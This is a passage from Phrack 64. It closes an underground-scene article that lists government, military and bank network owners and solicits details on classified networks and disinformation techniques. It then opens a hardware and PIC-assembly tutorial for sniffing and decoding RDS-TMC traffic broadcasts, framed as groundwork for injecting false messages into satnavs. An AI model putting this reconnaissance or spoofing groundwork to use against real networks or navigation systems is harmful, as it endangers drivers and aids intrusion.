 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
 - : Central Intelligence Agency
 - : Central Intelligence Agency
 - : The Pentagon
 - : The Pentagon
 - : The Pentagon
 - : The Pentagon
 - : The Pentagon
 - : Army Information Systems Command-Pentagon
 - : DoD Network Information Center
 - : U.S. Army Research Laboratory
 - : U.S. Army Research Laboratory
 - : United States Army Corps of Engineers
 - : U.S. Army Research Laboratory
 - : DoD Network Information Center
 - : DoD Network Information Center
 - : U.S. ARMY Tank-Automotive Command
 - : DoD Network Information Center
 - : DoD Network Information Center
 - : Headquarters, USAAISC
 - : U.S. Army Research Laboratory
 - : DoD Network Information Center
 - : DARPA ISTO
 - : Defense Advanced Research Projects Agency
 - : POLFIN (Ministry of Finance Poland)
 - : Ministry of Education Computer Center Taiwan
 - : Kuwait Ministry of Communications
 - : Ministry of Interior Hungary
 - : United States Army Space and Strategic Defense
 - : United States Cellular Telephone
 - : NATO Headquarters
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : NASA
 - : FBI Criminal Justice Information Systems
 - : Navy Regional Data Automation Center
 - : Navy Regional Data Automation Center
 - : Navy Regional Data Automation Center
 - : France Telecom R&D
 - : France Telecom R&D
 - : France Telecom R&D
 - : Alcanet International (Alcatel)
 - : Credit Agricole
 - : Credit Agricole
 - : Credit Agricole
 - : Bank of America
 - : Bank of America
 - : The Chase Manhattan Bank
 - : Banque Nationale de Paris
 - : Swiss Federal Military Dept.
 - : Navy Aviation Supply Office
 - : Commanding Officer Navy Ships Parts
 - : Navy Personnel Research
 - : Secretary of the Navy
 - : Halliburton Company
 - : Science Applications International

    The last one is definitely interesting; people interested in
obscure technologies should investigate SAIC stuff in depth...

    But anyway, this list is rough and incomplete. We have a lot more
interesting ranges, not yet classified. It's just to show you how easy
this information is to obtain.

    If you think the idea is funny, send us your ranges. We would be
pleased to include them in our list. The idea is to offer the most
complete list we can in the next Phrack release.

----[ 5.4. The axis of knowledge

    I'm sure that everyone knows "the axis of evil". This sensational
expression was coined some years ago by Mr. Bush to group wicked
countries (but was it really invented by the "president" or by m1st3r
Karl Rove??). We could use the same expression to name the evil
subjects that we would like to have in Phrack. But I will leave Mr.
Powerful Bush his expression and find a more noble one: The Axis of
Knowledge.

    So what is it about? Just a list of some topics that we would like
to find more often in Phrack. In the past years, Phrack was mainly
focused on exploitation, shellcodes, kernels and reverse engineering.
I'm not saying that this was not interesting, I'm saying that we need
to diversify the articles of Phrack. Everyone agrees that we must know
the advances in heap exploitation, but we should also know how to
exploit new technologies.

------[ 5.4.1 New Technologies

    To illustrate my point, we can take a quote from Phrack 62, the
profiling of Scut:

Q: What suggestions do you have for Phrack?

A:  For the article topics, I personally would like to see more articles
on upcoming technologies to exploit, such as SOAP, web services,
.NET, etc.

    We think he was right. We need more articles on upcoming
technologies. Hackers have to stay up to date. Low level hacking is
interesting but we also need to adapt ourselves to new technologies.

    These could include: RFID, Web 2.0, GPS, Galileo, GSM, UMTS, Grid
Computing, Smartdust systems.

    Also, since the name Phrack is a combination of Phreak and Hack,
having more articles related to Phreaking would be great. If you have a
look at all the Phrack issues from 1 to 30, the majority of articles
talked about Phreaking. And Phreaking and new technologies are closely
related.

------[ 5.4.2 Hidden and private networks

    We would like to have a detailed description of, or at least an
introduction to, the private networks used by governments. These
include:

* Cyber Security Knowledge Transfer Network (KTN)

* Unclassified but Sensitive Internet Protocol Router Network (NIPRNet)

* The Secret Internet Protocol Router Network (SIPRNet)

* Advanced Technology Demonstration Network

* Global Information Grid (GIG)

    There are a lot of private networks in the world and some are not
documented. What we want to know is: how are they implemented, who is
using them, which protocols are used (is it ATM, SONET...?), is there a
way to access them through the Internet, ...

    If you have any information to share on these networks, we would be
very interested to hear from you.

------[ 5.4.3 Information warfare

    Information warfare is probably one of the most interesting
upcoming subjects of recent years. Information is present everywhere
and the one who controls the information will be the master. The USA
already understands this well, China too, but some countries are still
late, especially in Europe. Some websites already specialize in
information warfare, like IWS, the Information Warfare Site (

    You can also find some schools across the world which are specialized
in information warfare.

    We, hackers, can use our knowledge and ingeniousness to do
something in this domain. Let me give you two examples. The first one
is Black Hat SEO ( This subject is really interesting
because it combines a lot of subjects like development, hacking,
social engineering, linguistics, artificial intelligence and even
marketing. These techniques can be used in Information Warfare and we
would like the Underground to know more about this subject.

    Second example: in a document entitled "Who is n3td3v?", the author
(Hacker Factor) used linguistic techniques in order to identify n3td3v.
After analyzing n3td3v's texts, the author claims that n3td3v and
GOBBLES are probably the same person. N3td3v's answer was to say that
he has an A.I. program allowing him to generate text automatically. If
he wants to sound like George Bush, he simply has to find a lot of
articles by him, feed these texts to his A.I., and the program will
build a model representing the way George Bush writes. Once the model
is created, he can give a text to the A.I. and this text will be
translated into "George Bush speaking". The author's (Hacker Factor)
answer was to say that this is not possible.

    Working in text-mining myself, I can tell you that it is possible.
The majority of people working in the academic area are blind, and when
you come to them with innovative techniques, they generally tell you
that you are a dreamer. A simple implementation can be realized quickly
with the use of a grammar (which you can even induce automatically), a
thesaurus and Markov chains. Add some home-made rules and you can have
a small system to modify a text.
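    To show how little code the Markov-chain core needs, here is a toy
word-bigram sketch in awk. The training sentence is made up, and a real
tool would be far more than this: a large corpus plus the grammar and
thesaurus mentioned above.

```shell
# learn word successors from a training text, then random-walk
echo "the spy reads the mail the spy taps the wire" | awk '
{ for (i = 1; i < NF; i++) succ[$i] = succ[$i] " " $(i + 1) }
END {
    srand(1337)
    w = "the"; out = w
    for (n = 0; n < 6; n++) {
        k = split(succ[w], a, " ")     # candidate next words
        if (k == 0) break              # dead end: no known successor
        w = a[int(rand() * k) + 1]     # pick one at random
        out = out " " w
    }
    print out                          # e.g. "the spy taps the mail..."
}'
```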

    An idea could be to release a tool like this (the binary, not the
source). I already have the title for the article: "Defeating
forensics: how to cover your says"!

    More generally, in information warfare, interesting subjects could be:

* Innovative information retrieval techniques
* Automatic diffusion of manipulated information
* Tracking of manipulated information

    Military and advanced centers like DARPA are already interested in
these topics. We don't have to let governments have the monopoly on
these areas. I'm sure we can do much better than governments.

------[ 5.4.4 Spying System

    Everyone knows ECHELON; it's probably the most documented spying
system in the world. Unfortunately, the majority of the information
that you can find on ECHELON is about where the ECHELON bases in the
world are. There is nothing about how they manipulate data. It's
evident that they are using some data-mining techniques like speech
recognition, text cleaning, topic classification, named entity
recognition, sentiment detection and so on. For this they could use
their own software, or maybe they are using some commercial software
like:

Retrievalware from Convera :

Inxight's products:

"Minority Report"-like system visualization:


    For now we are like Socrates, all we know is that we know nothing.
Nothing about how they process data. But we are very interested to know.

    In the same vein, we would like to know more about Narus
(, which could be seen as the successor of CARNIVORE, the
FBI's tool to intercept electronic data. Which countries use Narus,
where is it installed, how is Narus processing data, ...
    Actually any system which is supposed to spy on us is interesting.

--[ 6. Conclusion

    I'm reaching the end of my subject. As with every article, some
people will agree with the content and some will not. I'm probably not
the best person to talk about the Underground, but I tried to summarize
in this text all the interesting discussions I have had over several
years with a lot of people. I tried to analyze the past and present
scene and to give you a snapshot as accurate as possible.

    I'm not entirely satisfied; there's a lot more to say. But if this
article can already make you think about the current scene or the
Underground in general, it means that we are on the right way.

    The most important thing to retain is the need to get back the
Underground spirit. The world changes, people change, the security world
changes but the Underground has to keep its spirit, the spirit which
characterized it in the past.

    I gave you some ideas about how we could do it, but there are many
more ideas in 10000 heads than in one. Anyone who worries about the
current scene is invited to give his opinion about how we could do it.

    So let's go for the wakeup of the Underground. THE wakeup. A wakeup
to show the world that the Underground is not dead. That it will never
die, that it is still alive and will be for a long time.

    That's the responsibility of all hackers around the world.


              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 5              (* *)
            | - |                                            | - |
            |   |     Hijacking RDS-TMC Traffic Information  |   |
            |   |                   signals                  |   |
            |   |                                            |   |
            |   |       by Andrea "lcars" Barisani           |   |
            |   |            <>         |   |                              
            |   |          Daniele "danbia" Bianco           |   |
            |   |            <>        |   |

--[ Contents

1. - Introduction
2. - Motivation
3. - RDS
4. - RDS-TMC
5. - Sniffing circuitry
6. - Simple RDS Decoder v0.1
7. - Links

--[ 1. Introduction

Modern Satellite Navigation systems use a recently developed standard
called RDS-TMC (Radio Data System - Traffic Message Channel) for
receiving traffic information over FM broadcasts. The protocol allows
communication of traffic events such as accidents and queues. If the
information affects the current route plotted by the user, it is used
for calculating and suggesting detours and alternate routes. We are
going to show how to receive and decode RDS-TMC packets using cheap
homemade hardware; the goal is understanding the protocol so that
eventually we may show how trivial it is to inject false information.

We also include the first release of our Simple RDS Decoder (srdsd is the
lazy name) which as far as we know is the first open source tool available
which tries to fully decode RDS-TMC messages. It's not restricted to
RDS-TMC since it also performs basic decoding of RDS messages.

The second part of the article will cover transmission of RDS-TMC
messages, satellite navigator hacking via TMC and its impact for social
engineering purposes.
--[ 2. Motivation

RDS has primarily been used for displaying broadcasting station names
on FM radios and giving alternate frequencies; there has been little
value, other than pure research and fun, in hijacking it to display
custom messages.

However, with the recent introduction of RDS-TMC throughout Europe we are
seeing valuable data being transmitted over FM that actively affects SatNav
operations and eventually the driver's route choice. This can
have very important social engineering consequences. Additionally, RDS-TMC
messages can be an attack vector against SatNav parsing capabilities.

Considering the increasing importance of these systems' role in car
operation (which is no longer strictly limited to route plotting) and
their human interaction, they represent an interesting target, combined
with the "cleartext" and unauthenticated nature of RDS/RDS-TMC
messages.

We'll explore the security aspects in Part II.

--[ 3. RDS

The Radio Data System standard is widely adopted on pretty much every
modern FM radio, 99.9% of all car FM radio models feature RDS nowadays.
The standard is used for transmitting data over FM broadcasts and RDS-TMC
is a subset of the type of messages it can handle. The RDS standard is
described in the European Standard 50067.

The most recognizable data transmitted over RDS is the station name,
which is often shown on your radio display; other information includes
alternate frequencies for the station (which can be tried when the
signal is lost), descriptive information about the program type,
traffic announcements (most radios can be set up to interrupt CD and/or
tape playing and switch to radio when a traffic announcement is
detected), time and date, and many more, including TMC messages.

In an FM transmission the RDS signal is transmitted on a 57 kHz
subcarrier in order to separate the data channel from the Mono and/or
Stereo audio.

FM Spectrum:

  Mono   Pilot Tone   Stereo (L-R)     RDS Signal
   ^         ^           ^   ^            ^^
 ||||||||||  |   ||||||||||  ||||||||||   ||
 ||||||||||  |   ||||||||||  ||||||||||   ||
 ||||||||||  |   ||||||||||  ||||||||||   || 
 ||||||||||  |   ||||||||||  ||||||||||   ||
 ||||||||||  |   ||||||||||  ||||||||||   ||
            19k 23k        38k        53k 57k              Freq (Hz)

The RDS signal is sampled against a clock frequency of 1.1875 kHz; this
means that the data rate is 1187.5 bit/s (with a maximum deviation of
+/- 0.125 bit/s).
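Those numbers are consistent: the bit clock is the 57 kHz subcarrier
divided by 48, which a one-liner confirms:

```shell
# RDS bit rate = subcarrier frequency / 48
awk 'BEGIN { printf "%.1f bit/s\n", 57000 / 48 }'   # prints 1187.5 bit/s
```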

The wave amplitude is decoded into a binary representation, so the
actual data stream will be friendly '1's and '0's.

The smallest RDS "packet" is called a Block; 4 Blocks make up a Group.
Each Block carries 26 bits of information, making a Group 104 bits
large.

Group structure (104 bits):

| Block 1 | Block 2 | Block 3 | Block 4 |

Block structure (26 bits):

 ---------------- ---------------------
| Data (16 bits) | Checkword (10 bits) |
 ---------------- ---------------------

The Checkword is a checksum included in every Block and computed for error
protection, since the very nature of analog radio transmission introduces
many errors into data streams. The algorithm used is fully specified in
the standard and doesn't concern us for the moment.
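Although you don't need it just for sniffing, the checkword is easy to
compute. Here's a minimal sketch in Python, assuming the standard
parameters from the specification: the 10-bit checkword is the remainder
of the 16 data bits (multiplied by x^10) divided modulo 2 by
g(x) = x^10+x^8+x^7+x^5+x^4+x^3+1, XORed with a per-block "offset word"
(A/B/C/C'/D) that lets the receiver tell the four blocks apart:

```python
# Sketch of the RDS checkword computation (assumes the standard CRC
# parameters: g(x) = x^10+x^8+x^7+x^5+x^4+x^3+1 and offset words A-D).
G = 0b10110111001                       # g(x) coefficients, x^10 .. x^0
OFFSET = {'A': 0x0FC, 'B': 0x198, 'C': 0x168, "C'": 0x350, 'D': 0x1B4}

def checkword(data16, block):
    reg = data16 << 10                  # multiply the data by x^10
    for bit in range(25, 9, -1):        # mod-2 polynomial long division
        if reg & (1 << bit):
            reg ^= G << (bit - 10)
    return (reg ^ OFFSET[block]) & 0x3FF

# Block 1 carrying PI code 0x5401 gets checkword 0b1111011001
cw = checkword(0x5401, 'A')
```

A useful side effect of the offset words is block synchronization: a
decoder can slide a 26-bit window over the raw stream until the
checkwords start matching.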

Here's a representation of the most basic RDS Group:

Block 1:

 ---------------------              PI code   = 16 bits 
| PI code | Checkword |             Checkword = 10 bits

Block 2:                                               Group code = 4  bits
                                                       B0         = 1  bit
 ---------------------------------------------------   TP         = 1  bit 
| Group code | B0 | TP | PTY | <5 bits> | Checkword |  PTY        = 5  bits
 ---------------------------------------------------   Checkword  = 10 bits

Block 3:

 ------------------                 Data      = 16 bits
| Data | Checkword |                Checkword = 10 bits

Block 4:

 ------------------                 Data      = 16 bits
| Data | Checkword |                Checkword = 10 bits

The PI code is the Programme Identification code; it identifies the radio
station that's transmitting the message. Every broadcaster has a unique
assigned code.

The Group code identifies the type of message being transmitted as RDS can
be used for transmitting several different message formats. Type 0A (00000)
and 0B (00001) for instance are used for tuning information. RDS-TMC
messages are transmitted in 8A (10000) groups. Depending on the Group type
the remaining 5 bits of Block 2 and the Data part of Block 3 and Block 4
are used according to the relevant Group specification.

The 'B0' bit is the version code, '0' stands for RDS version A, '1' stands
for RDS version B.

The TP bit stands for Traffic Programme and indicates whether the station
is capable of sending traffic announcements (in combination with the TA
code present in 0A, 0B, 14B, 15B type messages). It has nothing to do with
RDS-TMC and refers to audio traffic announcements only.

The PTY code describes the Programme Type: for instance code 1 (converted
to decimal from its binary representation) is 'News' while code 4 is
'Sport'.
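Extracting the Block 2 fields from its 16 data bits is mechanical. A
small sketch (the helper name and the '0'/'1' string input format are our
own choice):

```python
def parse_block2(bits):
    """Split the 16 data bits of Block 2 (given as a '0'/'1' string)."""
    return {
        'group': int(bits[0:4], 2),     # Group type code
        'B0':    int(bits[4], 2),       # version code (0 = A, 1 = B)
        'TP':    int(bits[5], 2),       # Traffic Programme flag
        'PTY':   int(bits[6:11], 2),    # Programme Type
        'rest':  bits[11:16],           # meaning depends on the Group type
    }

# e.g. '0000010000101000' decodes as a 0A group, TP set, PTY 1 ('News')
```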

--[ 4. RDS-TMC

Traffic Message Channel packets carry information about traffic events,
their location and the duration of the event. A number of lookup tables are
being used to correlate event codes to their description and location
codes to the GPS coordinates, those tables are expected to be present in
our SatNav memory. The RDS-TMC standard is described in International
Standard (ISO) 14819-1.

All the most recent SatNav systems support RDS-TMC to some degree. Some
systems require the purchase of an external antenna in order to correctly
receive the signal; modern ones integrated in the car cockpit use the
existing FM antenna of the radio system. The interface of the SatNav
allows display of the list of received messages and prompts detours upon
events that affect the current route.

TMC packets are transmitted as type 8A (10000) Groups and they can be
divided into two categories: Single Group messages and Multi Group
messages. Single Group messages have bit number 13 of Block 2 set to '1';
Multi Group messages have bit number 13 of Block 2 set to '0'.

Here's a Single Group RDS-TMC message:

Block 1:

 ---------------------              PI code   = 16 bits 
| PI code | Checkword |             Checkword = 10 bits

Block 2:                                                Group code = 4  bits
                                                        B0         = 1  bit
 -----------------------------------------------------  TP         = 1  bit 
| Group code | B0 | TP | PTY | T | F | DP | Checkword | PTY        = 5  bits
 -----------------------------------------------------  Checkword  = 10 bits

 T = 1 bit    DP = 3 bits  
 F = 1 bit    

Block 3:                                                D          = 1 bit 
                                                        PN         = 1 bit
 -------------------------------------                  Extent     = 3 bits
| D | PN | Extent | Event | Checkword |                 Event      = 11 bits
 -------------------------------------                  Checkword  = 10 bits

Block 4:

 ----------------------             Location  = 16 bits
| Location | Checkword |            Checkword = 10 bits

We can see the usual data which we already discussed for RDS as well as new
information (the <5 bits> are now described).

The 'F' bit is bit number 13 of Block 2; it identifies the message as a
Single Group (F = 1) or Multi Group (F = 0) message.

The 'T', 'F' and 'D' bits are used in Multi Group messages for identifying
if this is the first group (TFD = 001) or a subsequent group (TFD = 000)
in the sequence.
The 'DP' field stands for duration and persistence; it contains
information about the timeframe of the traffic event so that the client
can automatically flush old ones.

The 'D' bit tells the SatNav if diversion advice needs to be prompted or
not.

The 'PN' bit (Positive/Negative) indicates the direction of queue events.
It is opposite to the road direction, since it represents the direction of
the growth of a queue (or any directional event).

The 'Extent' data shows the extension of the current event, it is measured
in terms of nearby Location Table entries.

The 'Event' part contains the 11-bit Event code, which is looked up in the
local Event Code table stored in the SatNav memory. The 'Location' part
contains the 16-bit Location code, which is looked up in the Location
Table database, also stored in your SatNav memory. Some countries allow a
free download of the Location Table database (like Italy[1]).
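Given the fixed layout above, decoding Block 3 of a Single Group message
is a matter of slicing bits. A sketch (function name is ours):

```python
def parse_tmc_block3(bits):
    """Split the 16 data bits of Block 3 in an 8A Single Group message."""
    return {
        'D':      int(bits[0], 2),      # diversion advice bit
        'PN':     int(bits[1], 2),      # Positive/Negative direction
        'extent': int(bits[2:5], 2),    # extent, in Location Table steps
        'event':  int(bits[5:16], 2),   # index into the Event Code table
    }

# e.g. '0101100001110011' -> direction '-', extent 3, event 115
```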

Multi Group messages are a sequence of two or more 8A groups and can
contain additional information such as speed limit advices and
supplementary information.

--[ 5. Sniffing circuitry

Sniffing RDS traffic basically requires three components:

1. FM radio with MPX output
2. RDS signal demodulator
3. RDS protocol decoder

The first element is a FM radio receiver capable of giving us a signal
that has not already been demodulated into its different components, since
we need access to the RDS subcarrier (an audio-only output would do no
good). This kind of "raw" signal is called MPX (Multiplex). The easiest
way to get such a signal is to buy a standard PCI video card that carries
a tuner which exposes a MPX pin we can hook to.

One of these tuners is the Philips FM1216[2] (available in different
"flavours", they all do the trick) which provides pin 25 for this purpose.
It's relatively easy to identify a PCI video card that uses this tuner; we
used the WinFast DV2000. An extensive database[3] is available.

Once we get the MPX signal it can be connected to a RDS signal
demodulator which will perform the demodulation and give us parsable
data. Our choice is the ST Microelectronics TDA7330B[4], a commercially
available chip used in most radios capable of RDS demodulation. Another
possibility could be the Philips SAA6579[5]; it offers the same
functionality as the TDA7330, though the pinout might differ.

Finally, we use a custom PIC (Peripheral Interface Controller) for
preparing and sending the information generated by the TDA7330 to
something that we can understand and use, like a standard serial port.

The PIC takes DATA, QUAL and CLOCK from the demodulator and "creates" a
stream good enough to be sent to the serial port. Our PIC uses only two
pins of the serial port (RX - RTS); it prints out ascii '0' and '1'
clocked at a 19200 baud rate with one start bit and two stop bits, no
parity bit.

As you can see the PIC makes our life easier: in order to see the raw
stream we only have to connect the circuit and attach a terminal to the
serial port, no particular driver is needed. The PIC we use is a PIC
16F84; this microcontroller is cheap and easy to work with (its assembly
has only 35 instructions), and a programmer for setting up the chip can
be easily bought or assembled. If you want to build your own programmer a
good choice would be uJDM[6], one of the simplest PIC programmers
available (a variation of the famous JDM programmer).

At last we need to convert the signals from the PIC to RS232-compatible
signal levels. This is needed because the PIC and other integrated
circuits work at TTL levels (Transistor-Transistor Logic, 0V/+5V),
whereas serial port signal levels are -12V/+12V. The easiest approach for
converting the signal is using a Maxim RS-232 transceiver[7], such as the
MAX232: a specialized driver and receiver integrated circuit used to
convert between TTL logic levels and RS-232 compatible signal levels.

Here's the diagram of the setup:

                \   /
                 \ / 
                  |                     [ RDS - Demodulator ]
                  |                           *diagram*
   ______________[ ]__
  |-        ||        |=-                         
  |-        ||  F T   |=-
  |-        ||  M U   |=-
P |-        ||  1 N   |=- 
C |-        ||  2 E   |=-                 
I |-        ||  1 R   |=-                  
  |-        ||  6     |=-                           1  _______  20
B |         ||________|=- --------> MPX  --->  MUXIN -|.  U   |-
u |-                  | pin 25                       -|       |-
s |-                  | AF sound output              -|   T   |-
  |-                  |                              -|   D   |-
  |-                  |                              -|   A   |-
  |-                  |                              -|   7   |-
  |-                  |                              -|   3   |- QUAL______
  |-                  |                              -|   3   |- DATA____  |
  |-                  |                              -|   0   |- CLOCK_  | |
  |___________________|                              -|_______|-       | | V
                                                   10          11      | V |
        _______________________________________________________________V | |
       |      ___________________________________________________________| |
       |  ___|_____________________________________________________________|
       | |   |
       | |   |           1  _______  18
       V |   V          x -|.  u   |- -> data out (to rs232)______________
       | V   |          x -|       |- -> rts  out (to rs232)____________  |
       | |  _|          x -|   1   |- <- osc1 / clkin                   | |
       | | |      MCLR -> -|   6   |- -> OSC2 / CLKOUT                  | V
       | | | Vss (gnd) -> -|   F   |- <- Vdd (+5V)                      V |
       | | |_____ DATA -> -|   8   |- x                                 | |
       | |_______ QUAL -> -|   4   |- x                                 | |
       |________ CLOCK -> -|       |- x                                 | |
                        x -|_______|- x                                 | |
                         9           10                                 | |
                                       ______________________________   | |
    Serial Port                       |            1  _______  16    |  | |
   (DB9 connector)                    |             -|.  U   |-      ^  | | 
              ______________          |             -|       |-      |  | |
             | RX - pin2    |         |             -|   R   |- RTS _|  | |
         ____V________      |         |             -|   S   |-         V |
        |  . o . . .  |     |         |             -|   2   |-         | V 
         \  . o . .  /      |         |             -|   3   |- <- _____| |
           ---------        |_________|____ <- DATA -|   2   |- <- _______|
              ^ RTS - pin 7           |             -|_______|-         
              |_______________________|            8           9       

Here's the commented assembler code for our PIC:

; Copyright 2007 Andrea Barisani <>
;                Daniele Bianco <>
; Permission to use, copy, modify, and distribute this software for any
; purpose with or without fee is hereby granted, provided that the above
; copyright notice and this permission notice appear in all copies.
; Pin diagram:   
;                   1  _______  18
;                  x -|.  U   |- -> DATA out (to RS232)
;                  x -|       |- -> RTS  out (to RS232)
;                  x -|   1   |- <- OSC1 / CLKIN 
;            MCLR -> -|   6   |- -> OSC2 / CLKOUT
;       Vss (gnd) -> -|   F   |- <- Vdd (+5V)
;            DATA -> -|   8   |- x   
;            QUAL -> -|   4   |- x
;           CLOCK -> -|       |- x
;                  x -|_______|- x
;                   9           10 
; Connection description:
; pin 4 : MCLR          (it must be connected to Vdd through a resistor
;                        to prevent PIC reset - 10K is a good resistor)
; pin 5 : Vss           (directly connected to gnd)
; pin 6 : DATA  input   (directly connected to RDS demodulator DATA  out)
; pin 7 : QUAL  input   (directly connected to RDS demodulator QUAL  out)
; pin 8 : CLOCK input   (directly connected to RDS demodulator CLOCK out)
; pin 14: Vdd           (directly connected to +5V)
; pin 15: OSC2 / CLKOUT (connected to an 2.4576 MHz oscillator crystal* )
; pin 16: OSC1 / CLKIN  (connected to an 2.4576 MHz oscillator crystal* )
; pin 17: RTS  output   (RS232 - ''RTS'' pin 7 on DB9 connector** )
; pin 18: DATA output   (RS232 - ''RX''  pin 2 on DB9 connector** )
; pin 1,2,3,9,10,11,12,13: unused
; *)
; We can connect the oscillator crystal to the PIC using this simple 
; circuit:
;                C1 (15-33 pF)
;              ____||____ ______ OSC1 / CLKIN  
;             |    ||    |     
;             |         ___
;      gnd ---|          =  XTAL (2.4576 MHz)
;             |         ---
;             |____||____|______ 
;                  ||            OSC2 / CLKOUT
;                C2 (15-33 pF)
; **) 
; We have to convert signals TTL <-> RS232 before we send/receive them 
; to/from the serial port. 
; Serial terminal configuration:
; 8-N-2 (8 data bits - No parity - 2 stop bits)

; HARDWARE CONF -----------------------
    PROCESSOR    16f84
    RADIX        DEC
    INCLUDE      ""

    ERRORLEVEL   -302                  ; suppress warnings for bank1

    __CONFIG 1111111110001b            ; Code Protection  disabled
                                       ; Power Up Timer    enabled
                                       ; WatchDog Timer   disabled
                                       ; Oscillator type        XT
; -------------------------------------

; DEFINE ------------------------------
#define    Bank0     bcf  STATUS, RP0  ; activates bank 0
#define    Bank1     bsf  STATUS, RP0  ; activates bank 1

#define    Send_0    bcf     PORTA, 1  ; send 0 to RS232 RX
#define    Send_1    bsf     PORTA, 1  ; send 1 to RS232 RX
#define    Skip_if_C btfss  STATUS, C  ; skip if C FLAG is set

#define    RTS               PORTA, 0  ; RTS   pin RA0
#define    RX                PORTA, 1  ; RX    pin RA1
#define    DATA              PORTB, 0  ; DATA  pin RB0
#define    QUAL              PORTB, 1  ; QUAL  pin RB1
#define    CLOCK             PORTB, 2  ; CLOCK pin RB2

RS232_data     equ               0x0C  ; char to transmit to RS232
BIT_counter    equ               0x0D  ; n. of bits to transmit to RS232
RAW_data       equ               0x0E  ; RAW data (from RDS demodulator)
dummy_counter  equ               0x0F  ; dummy counter... used for delays
; -------------------------------------

; BEGIN PROGRAM CODE ------------------

    ORG    000h

    Bank1                              ; select bank 1
    movlw  00000000b                   ; RA0-RA4 output
    movwf  TRISA                       ;
    movlw  00000111b                   ; RB0-RB2 input / RB3-RB7 output
    movwf  TRISB                       ;
    Bank0                              ; select bank 0
    movlw  00000010b                   ; set voltage at -12V to RS232 ''RX''
    movwf  PORTA                       ;

Main
    btfsc  CLOCK                       ; wait for clock edge (high -> low)
    goto   Main                        ;

    movfw  PORTB                       ; 
    andlw  00000011b                   ; reads levels on PORTB and send
    movwf  RAW_data                    ; data to RS232
    call   RS232_Tx                    ; 

    btfss  CLOCK                       ; wait for clock edge (low -> high)
    goto   $-1                         ;               
    goto   Main

RS232_Tx                               ; RS232 (19200 baud rate) 8-N-2
                                       ; 1 start+8 data+2 stop - No parity  
    btfsc  RAW_data,1
    goto   Good_qual
    goto   Bad_qual
Good_qual                              ; 
    movlw  00000001b                   ;
    andwf  RAW_data,w                  ; good quality signal 
    iorlw  '0'                         ; sends '0' or '1' to RS232
    movwf  RS232_data                  ; 
    goto   Char_Tx

Bad_qual                               ;
    movlw  00000001b                   ;
    andwf  RAW_data,w                  ; bad  quality signal     
    iorlw  '*'                         ; sends '*' or '+' to RS232
    movwf  RS232_data                  ;

Char_Tx
    movlw  9                           ; (8 bits to transmit)
    movwf  BIT_counter                 ; BIT_counter = n. bits + 1

    call   StartBit                    ; sends start bit

Send_loop
    decfsz BIT_counter, f              ; sends all data bits contained in
    goto   Send_data_bit               ; RS232_data

    goto   StopBit                     ; sends 2 stop bits and returns to
                                       ; Main (via StopBit's RETURN)
StartBit
    Send_0                             ; start bit ('0' for one bit time)
    call   Delay16
    goto   Delay16

StopBit
    Send_1                             ; stop bits ('1' for two bit times)
    call   Delay16
    call   Delay16
    call   Delay16
    goto   Delay16

Send_1_
    Send_1                             ; data bit '1' for one bit time
    call   Delay16
    goto   Delay16

Send_0_
    Send_0                             ; data bit '0' for one bit time
    call   Delay16
    goto   Delay16

Send_data_bit
    rrf    RS232_data, f               ; result of rotation is saved in
    Skip_if_C                          ; C FLAG, so skip if FLAG is set
    goto   Send_zero
    call   Send_1_
    goto   Send_loop
Send_zero
    call   Send_0_
    goto   Send_loop
; 4 / clock = ''normal'' instruction period (1 machine cycle )
; 8 / clock = ''branch'' instruction period (2 machine cycles)
;     clock            normal instr.           branch instr. 
;   2.4576 MHz           1.6276 us               3.2552 us

Delay16
    movlw  2                           ; dummy cycle,
    movwf  dummy_counter               ; used only to get correct delay
                                       ; for timing.
    decfsz dummy_counter,f             ; 
    goto  $-1                          ; Total delay: 8 machine cycles
    nop                                ; ( 1 + 1 + 1 + 2 + 2 + 1 = 8 )

Delay8
    movlw  2                           ; dummy cycle,
    movwf  dummy_counter               ; used only to get correct delay
                                       ; for timing.
    decfsz dummy_counter,f             ; 
    goto   $-1                         ; Total delay: 7 machine cycles
                                       ; ( 1 + 1 + 1 + 2 + 2 = 7 )

    RETURN                             ; unique return point


; END PROGRAM CODE --------------------


Using the circuit we assembled we can "sniff" RDS traffic directly on the
serial port using screen, minicom or whatever terminal app you like.
You should configure your terminal before attaching it to the serial
port; the settings are 19200 baud rate, 8 data bits, 2 stop bits, no
parity.

# stty -F /dev/ttyS0 19200 cs8 cstopb -parenb
speed 19200 baud; rows 0; columns 0; line = 0; intr = ^C; quit = ^\; 
erase = ^?; kill = ^H; eof = ^D; eol = <undef>; eol2 = <undef>;
swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; flush = ^O; min = 100; time = 2; -parenb -parodd 
cs8 -hupcl cstopb cread clocal crtscts -ignbrk brkint ignpar -parmrk -inpck
-istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8
-opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 
vt0 ff0 -isig -icanon iexten -echo echoe echok -echonl -noflsh -xcase 
-tostop -echoprt echoctl echoke

# screen /dev/ttyS0 19200
0011101100010011000100000+000000000 ... <and so on>

As you can see we get '0' and '1' as well as '*' and '+'; this is because
the circuit estimates the quality of the signal: '*' and '+' are
bad-quality '0' and '1' data. Bad-quality data should be ignored, and if
you see a relevant amount of '*' and '+' in your stream you should verify
the tuner settings.

In order to identify the beginning of an RDS message and find the right
offset we "lock" onto the PI code, which is present at the beginning of
every RDS Group. PI codes for every FM radio station are publicly
available on the Internet; if you know the frequency you are listening to
you can figure out the PI code and look for it. If you have no clue about
what the PI code might be, a way of finding it out is seeking the most
recurring 16-bit string, which is likely to be the PI code.
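The "most recurring 16-bit string" heuristic takes only a few lines of
code. A sketch (the function name is our own):

```python
from collections import Counter

def find_pi(stream, width=16):
    """Count every 16-bit window in the bit stream; the PI code repeats
    at the start of every Group, so it should top the list."""
    wins = (stream[i:i + width] for i in range(len(stream) - width + 1))
    return Counter(wins).most_common(5)
```

This is essentially what the '-P' option of the decoder presented below
does.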

Here's a single raw RDS Group with PI 5401 (hexadecimal conversion of
0101010000000001):

01010100000000011111011001000001000010100011001011000000001000010100000011001001010010010000010001101110

Let's separate the different sections:

0101010000000001 1111011001 0000  0  1  00001 01000    1100101100 0000001000010100 0000110010 0101001001000001 0001101110
